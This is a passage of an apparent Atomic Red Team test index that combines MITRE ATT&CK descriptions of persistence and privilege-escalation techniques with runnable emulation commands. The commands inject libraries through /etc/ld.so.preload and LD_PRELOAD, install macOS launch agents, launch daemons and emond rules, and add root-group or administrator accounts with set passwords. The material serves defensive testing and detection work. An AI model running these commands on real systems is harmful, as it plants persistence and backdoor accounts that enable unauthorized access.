marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LC_LOAD_DYLIB Addition - description: |- - Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. 
The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. - - Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) - id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:50:36.235Z' - created: '2020-01-24T14:21:52.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor processes for those that may be used to modify binary - headers. Monitor file systems for changes to application binaries and invalid - checksums/signatures. Changes to binaries that do not line up with application - updates or patches are also extremely suspicious. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Binary file metadata - x_mitre_platforms: - - macOS - atomic_tests: [] - T1574.006: - technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 - description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. 
The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) - - Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) - - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. 
- - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. - source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. 
- x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
- supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1547.008: - technique: - created: '2020-01-24T18:38:55.801Z' - modified: '2020-03-25T16:52:26.567Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 - description: |- - Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) - - Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. 
- name: LSASS Driver - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.008 - url: https://attack.mitre.org/techniques/T1547/008 - - url: https://technet.microsoft.com/library/cc961760.aspx - description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved - November 27, 2017. - source_name: Microsoft Security Subsystem - - url: https://technet.microsoft.com/library/dn408187.aspx - description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. - Retrieved November 27, 2017. - source_name: Microsoft LSA Protection Mar 2014 - - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx - description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November - 27, 2017. - source_name: Microsoft DLL Security - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Vincent Le Toux - x_mitre_data_sources: - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events - 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: - Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. - (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc - utility (Citation: TechNet Autoruns) to examine loaded drivers associated - with the LSA. 
" - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1543.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.001 - url: https://attack.mitre.org/techniques/T1543/001 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated - code. Retrieved July 5, 2017. - source_name: Antiquated Mac Malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. 
(2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application - Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. - source_name: OceanLotus for OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Agent - description: "Adversaries may create or modify launch agents to repeatedly execute - malicious payloads as part of persistence. Per Apple’s developer documentation, - when a user logs in, a per-user launchd process is started which loads the - parameters for each launch-on-demand user agent from the property list (plist) - files found in /System/Library/LaunchAgents, /Library/LaunchAgents, - and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent - Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). - These launch agents have property list files which point to the executables - that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install - a new launch agent that can be configured to execute at login by using launchd - or launchctl to load a plist into the appropriate directories (Citation: - Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The - agent name may be disguised by using a name from a related operating system - or benign software. Launch Agents are created with user level privileges and - are executed with the privileges of the user when they log in (Citation: OSX - Malware Detection) (Citation: OceanLotus for OS X). 
They can be set up to - execute when a specific user logs in (in the specific user’s directory structure) - or when any user logs in (which requires administrator privileges)." - id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T22:11:45.513Z' - created: '2020-01-17T16:10:58.592Z' - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: Monitor Launch Agent creation through additional plist files - and utilities such as Objective-See’s KnockKnock application. Launch Agents - also require files on disk for persistence which can also be monitored via - other file monitoring applications. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_platforms: - - macOS - identifier: T1543.001 - atomic_tests: - - name: Launch Agent - auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - description: 'Create a plist and execute it - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; - exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - if [ ! 
-d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; - sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} - sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} - cleanup: | - sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} - sudo rm ~/Library/LaunchAgents/#{plist_filename} - T1543.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.004 - url: https://attack.mitre.org/techniques/T1543/004 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf - description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. - Retrieved July 10, 2017.' 
- source_name: WireLurker - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Daemon - description: "Adversaries may create or modify launch daemons to repeatedly - execute malicious payloads as part of persistence. Per Apple’s developer documentation, - when macOS and OS X boot up, launchd is run to finish system initialization. - This process loads the parameters for each launch-on-demand system-level daemon - from the property list (plist) files found in /System/Library/LaunchDaemons - and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent - Daemons). These LaunchDaemons have property list files which point to the - executables that will be launched (Citation: Methods of Mac Malware Persistence). - \n\nAdversaries may install a new launch daemon that can be configured to - execute at startup by using launchd or launchctl to load a plist into the - appropriate directories (Citation: OSX Malware Detection). The daemon name - may be disguised by using a name from a related operating system or benign - software (Citation: WireLurker). Launch Daemons may be created with administrator - privileges, but are executed under root privileges, so an adversary may also - use a service to escalate privileges from administrator to root. \n\nThe plist - file permissions must be root:wheel, but the script or program that it points - to has no such requirement. So, it is possible for poor configurations to - allow an adversary to modify a current Launch Daemon’s executable and gain - persistence or Privilege Escalation. 
" - id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:46:44.130Z' - created: '2020-01-17T19:23:15.227Z' - x_mitre_data_sources: - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for launch daemon creation or modification through - plist files and utilities such as Objective-See''s KnockKnock application. ' - x_mitre_platforms: - - macOS - identifier: T1543.004 - atomic_tests: - - name: Launch Daemon - auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - description: 'Utilize LaunchDaemon to launch `Hello World` - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The plist file doesn''t exist. 
Check the path and - try again."; exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} - sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | - sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} - sudo rm /Library/LaunchDaemons/#{plist_filename} - T1053.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.004 - url: https://attack.mitre.org/techniques/T1053/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launchd - description: |- - Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). 
- - An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. - id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:41:14.739Z' - created: '2019-12-03T14:15:27.452Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - root - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." 
- x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - x_mitre_platforms: - - macOS - identifier: T1053.004 - atomic_tests: - - name: Event Monitor Daemon Persistence - auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - description: "This test adds persistence via a plist to execute via the macOS - Event Monitor Daemon. \n" - supported_platforms: - - macos - input_arguments: - script_location: - description: evil plist location - type: path - default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" - script_destination: - description: Path where to move the evil plist - type: path - default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" - empty_file: - description: Random name of the empty file used to trigger emond service - type: string - default: randomflag - executor: - name: bash - elevation_required: true - command: | - sudo cp #{script_location} #{script_destination} - sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | - sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} - T1136.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1136.001 - url: https://attack.mitre.org/techniques/T1136/001 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Account - description: |- - Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 
With a sufficient level of access, the net user /add command can be used to create a local account. - - Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. - id: attack-pattern--635cbe30-392d-4e27-978e-66774357c762 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T18:04:20.780Z' - created: '2020-01-28T13:50:22.506Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for processes and command-line parameters associated - with local account creation, such as net user /add or useradd. - Collect data on account creation within a network. Event ID 4720 is generated - when a user account is created on a Windows system. (Citation: Microsoft User - Creation Event) Perform regular audits of local system accounts to detect - suspicious accounts that may have been created by an adversary.' 
- x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1136.001 - atomic_tests: - - name: Create a user account on a Linux system - auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 - description: 'Create a user via useradd - -' - supported_platforms: - - linux - input_arguments: - username: - description: Username of the user to create - type: String - default: evil_user - executor: - command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - -' - cleanup_command: 'userdel #{username} - -' - name: bash - elevation_required: true - - name: Create a user account on a MacOS system - auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' - description: 'Creates a user on a MacOS system with dscl - -' - supported_platforms: - - macos - input_arguments: - username: - description: Username of the user to create - type: String - default: evil_user - realname: - description: "'realname' to record when creating the user" - type: String - default: Evil Account - executor: - command: | - dscl . -create /Users/#{username} - dscl . -create /Users/#{username} UserShell /bin/zsh - dscl . -create /Users/#{username} RealName "#{realname}" - dscl . -create /Users/#{username} UniqueID "1010" - dscl . -create /Users/#{username} PrimaryGroupID 80 - dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} - cleanup_command: 'dscl . -delete /Users/#{username} - -' - name: bash - elevation_required: true - - name: Create a new user in a command prompt - auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f - description: | - Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. 
To verify the - new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_CMD - password: - description: Password of the user to create - type: String - default: T1136.001_CMD! - executor: - command: 'net user /add "#{username}" "#{password}" - -' - cleanup_command: 'net user /del "#{username}" >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: Create a new user in PowerShell - auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde - description: | - Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the - new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_PowerShell - executor: - command: 'New-LocalUser -Name "#{username}" -NoPassword - -' - cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Create a new user in Linux with `root` UID and GID. - auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c - description: 'Creates a new user in Linux and adds the user to the `root` group. - This technique was used by adversaries during the Butter attack campaign. 
- -' - supported_platforms: - - linux - input_arguments: - username: - description: Username of the user to create - type: String - default: butter - password: - description: Password of the user to create - type: String - default: BetterWithButter - executor: - command: | - useradd -g 0 -M -d /root -s /bin/bash #{username} - if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; - cleanup_command: 'userdel #{username} - -' - name: bash - elevation_required: true - - name: Create a new Windows admin user - auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 - description: 'Creates a new admin user in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_Admin - password: - description: Password of the user to create - type: String - default: T1136_pass - executor: - command: | - net user /add "#{username}" "#{password}" - net localgroup administrators "#{username}" /add - cleanup_command: 'net user /del "#{username}" >nul 2>&1 - -' - name: command_prompt - elevation_required: true - T1078.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts - description: "Adversaries may obtain and abuse credentials of a local account - as a means of gaining Initial Access, Persistence, Privilege Escalation, or - Defense Evasion. 
Local accounts are those configured by an organization for - use by users, remote support, services, or for administration on a single - system or service.\n\nLocal Accounts may also be abused to elevate privileges - and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). - Password reuse may allow the abuse of local accounts across a set of machines - on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' - created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1078.003 - atomic_tests: - - name: Create local account with admin priviliges - auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - description: After execution the new account will be active and added to the - Administrators group - supported_platforms: - - windows - executor: - command: |- - net user art-test /add - net user art-test Password123! 
- net localgroup administrators art-test /add - cleanup_command: |- - net localgroup administrators art-test /delete >nul 2>&1 - net user art-test /delete >nul 2>&1 - name: command_prompt - elevation_required: true - T1037.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.002 - url: https://attack.mitre.org/techniques/T1037/002 - - url: https://support.apple.com/de-at/HT2420 - description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved - July 17, 2017.' - source_name: creating login hook - - source_name: S1 macOs Persistence - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved - March 27, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Logon Script (Mac) - description: "Adversaries may use macOS logon scripts automatically executed - at logon initialization to establish persistence. macOS allows logon scripts - (known as login hooks) to be executed whenever a specific user logs into a - system. A login hook tells Mac OS X to execute a certain script when a user - logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), - a login hook executes as the elevated root user.(Citation: creating login - hook)\n\nAdversaries may use these login hooks to maintain persistence on - a single system.(Citation: S1 macOs Persistence) Access to login hook scripts - may allow an adversary to insert additional malicious code. There can only - be one login hook at a time though and depending on the access configuration - of the hooks, either local credentials or an administrator account may be - necessary. 
